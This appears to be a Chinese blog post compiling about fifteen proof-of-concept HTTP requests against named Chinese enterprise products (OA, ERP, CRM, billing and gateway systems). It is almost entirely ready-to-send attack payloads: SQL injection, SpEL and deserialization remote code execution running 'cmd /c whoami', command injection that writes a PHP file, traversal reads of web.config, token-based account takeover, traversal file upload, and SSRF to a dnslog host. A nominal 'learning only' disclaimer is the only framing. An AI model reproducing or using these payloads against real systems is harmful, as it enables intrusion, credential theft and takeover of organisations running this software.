PoC 整理 (二)

吉沃运营专员

本文内容为互联网上收集，禁止用于非法用途，仅供学习使用！

北京派网软件有限公司 Panabit-Panalog 大数据日志审计系统 sprog_upstatus.php 存在 SQL 注入漏洞

1. GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1
   
2. Host:
   
3. Accept-Encoding: gzip, deflate, br, zstd
   
4. Accept-Language: zh-CN,zh;q=0.9
   
5. Cache-Control: max-age=0
   
6. Connection: keep-alive
   
7. Cookie: PHPSESSID=f8la8ttr74fkge0pttpc626p45

复制代码

契约锁电子签章平台ukeysign存在远程命令执行漏洞

1. POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1
   
2. Host:
   
3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
   
4. Gecko) Chrome/113.0.0.0 Safari/537.36
   
5. Content-Type: application/json
   
6. 
   
7. {"id":"2","params":[{"expression":"var a=new
   
8. org.springframework.expression.spel.standard.SpelExpressionParser();var b='SpEL 表达式的 base64 编
   
9. 码';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-
   
10. 8');var c=a.parseExpression(deStr);c.getValue();"}]}

复制代码

任我行协同CRM系统UploadFile存在反序列化漏洞

1. POST /SystemManage/UploadFile HTTP/1.1
   
2. Host: {{Hostname}}
   
3. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
   
4. Upgrade-Insecure-Requests: 1
   
5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
   
6. Gecko) Chrome/83.0.4103.116 Safari/537.36
   
7. Accept:
   
8. text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
   
9. Accept-Encoding: gzip, deflate
   
10. Content-Type: application/x-www-form-urlencoded
    
11. 
    
12. photoInfo={
    
13. '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{
    
14. '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':['cmd', '/c whoami']
    
15. },'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
    
16. }

复制代码

瑞斯康达-多业务智能网关-RCE

1. GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
   
2. Host:
   
3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
   
4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
   
5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
   
6. Accept-Encoding: gzip, deflate, br
   
7. Connection: close

复制代码

赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞

1. GET /AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f HTTP/1.1
   
2. Host:

复制代码

赛蓝企业管理系统GetJSFile存在任意文件读取漏洞

1. GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1
   
2. Host:
   
3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
   
4. Accept: */*
   
5. Accept-Encoding: gzip, deflate, br
   
6. Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
   
7. Connection: close

复制代码

赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞

1. GET /BaseModule/SysLog/ReadTxtLog?FileName=../web.config HTTP/1.1
   
2. Host:
   
3. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
   
4. Cookie: __RequestVerificationToken=EXiOGTuudShJEzYLR8AQgWCZbF2NB6_KXKrmqJJyp1cgyV6_LYy9yKQhNkHJGXXlbO_6NLQZPwUUdVZKH6e9KMuXyxV6Tg-w5Ftx-mKih3U1; ASP.NET_SessionId=2ofwed0gd2jc4paj0an0hpcl
   
5. Priority: u=0, i
   
6. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
   
7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
   
8. Accept-Encoding: gzip, deflate
   
9. Upgrade-Insecure-Requests: 1

复制代码

深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750)

1. POST /strategy/ip/bind-ip HTTP/2
   
2. Host:
   
3. Content-Type: application/x-www-form-urlencoded
   
4. 
   
5. data1=O%3A33%3A%22setasign%5CFpdi%5CPdfReader%5CPdfReader%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00parser%22%3BO%3A20%3A%22yii%5Credis%5CConnection%22%3A12%3A%7B

复制代码

拓尔思TRS媒资管理系统uploadThumb存在文件上传漏洞

1. POST /mas/servlets/uploadThumb?appKey=sv&uploadingId=asd HTTP/1.1
   
2. Accept: */*
   
3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX
   
4. Connection: close
   
5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
   
6. 
   
7. ------WebKitFormBoundarySl8siBbmVicABvTX
   
8. Content-Disposition: form-data; name="file";
   
9. filename="%2e%2e%2fwebapps%2fmas%2fa%2etxt"
   
10. Content-Type: application/octet-stream
    
11. 
    
12. 1234
    
13. ------WebKitFormBoundarySl8siBbmVicABvTX--

复制代码

天问物业ERP系统ContractDownLoad存在任意文件读取漏洞

1. GET /HM/M_Main/InformationManage/ContractDownLoad.aspx?ContractFile=../web.config HTTP/1.1
   
2. Host:
   
3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
   
4. Accept-Encoding: gzip, deflate
   
5. Accept-Language: zh-CN,zh;q=0.9
   
6. Connection: close

复制代码

天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞

1. GET /HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=../web.config HTTP/1.1
   
2. Host:
   
3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
   
4. Accept-Encoding: gzip, deflate
   
5. Accept-Language: zh-CN,zh;q=0.9
   
6. Connection: close

复制代码

天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞

1. GET /HM/M_main/InformationManage/VacantDiscountDownLoad.aspx?VacantDiscountFile=../web.config HTTP/1.1
   
2. Host:
   
3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
   
4. Accept-Encoding: gzip, deflate
   
5. Accept-Language: zh-CN,zh;q=0.9
   
6. Connection: close

复制代码

通达OAV11.10接口login.php存在SQL注入漏洞

1. POST /ispirit/interface/login.php HTTP/1.1
   
2. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.855.2 Safari/537.36
   
3. Content-Type: application/x-www-form-urlencoded
   
4. Host:
   
5. Content-Length: 107
   
6. 
   
7. name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1% 3d0,1,(select+~0%2b1))+limit+0,1))--+'

复制代码

万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749)

1. GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1&head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898%29%7C%7CCHR%2866%29%7C%7CCHR%2890%29%7C%7CCHR%28108%29%2C5%29--+YJdO&field=field_name&tabName=tfield HTTP/1.1
   
2. Host:

复制代码

用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞

1. POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1
   
2. Host:
   
3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
   
4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
   
5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
   
6. Accept-Encoding: gzip, deflate
   
7. Connection: close
   
8. Cookie: ASP.NET_SessionId=sfzg0pgxvld3ltgimecqkjg4; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1721822405; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1721822415; HMACCOUNT=AFE08148BD092161
   
9. Upgrade-Insecure-Requests: 1
   
10. Priority: u=0, i
    
11. Content-Type: application/x-www-form-urlencoded
    
12. Content-Length: 36
    
13. 
    
14. {
    
15.   "address":"ftlhbc.dnslog.cn"
    
16. }

复制代码